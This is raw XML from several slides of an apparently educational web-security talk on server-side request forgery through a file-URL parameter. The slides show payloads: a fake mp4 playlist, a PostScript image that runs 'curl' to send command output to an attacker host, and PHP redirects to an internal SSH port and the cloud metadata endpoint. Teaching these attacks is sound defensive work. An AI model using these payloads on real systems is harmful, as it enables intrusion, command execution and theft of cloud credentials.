            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reading From Remote mp4 File</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="Google Shape;854;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Google Shape;855;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/file.mp4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Google Shape;856;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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rgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.mp4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXTM3U</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXT-X-MEDIA-SEQUENCE:0</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXTINF:10.0,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://me.com/2.mp4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXT-X-ENDLIST</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="857" name="Google Shape;857;p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4025" y="2675525"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Google Shape;858;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="862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p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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864" name="Google Shape;864;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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5" name="Google Shape;865;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reading From Remote Image</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="Google Shape;866;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/file.jpg</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="1181400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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rgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdict /setpagedevice undef</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Save</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legal</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{null restore} stopped {pop} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{legal} stopped {pop} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restore</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mark /OutputFile (%pipe%curl${IFS}me.com/`id`)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>currentdevice putdeviceprops</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="870" name="Google Shape;870;p9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4025" y="2675525"/>
            <a:ext cx="421000" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="874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p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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876" name="Google Shape;876;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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7" name="Google Shape;877;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interaction With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Remote URL </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="878" name="Google Shape;878;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="879" name="Google Shape;879;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/index.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="880" name="Google Shape;880;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat index.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header("Location: http://[::]:22/");</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="881" name="Google Shape;881;p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4025" y="2675525"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Google Shape;882;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="886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p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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888" name="Google Shape;888;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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9" name="Google Shape;889;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interaction With Remote URL II </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="890" name="Google Shape;890;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="891" name="Google Shape;891;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/index.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat index.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header("Location: http://169.254.169.254/latest/meta-data/", TRUE, 303);</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893" name="Google Shape;893;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
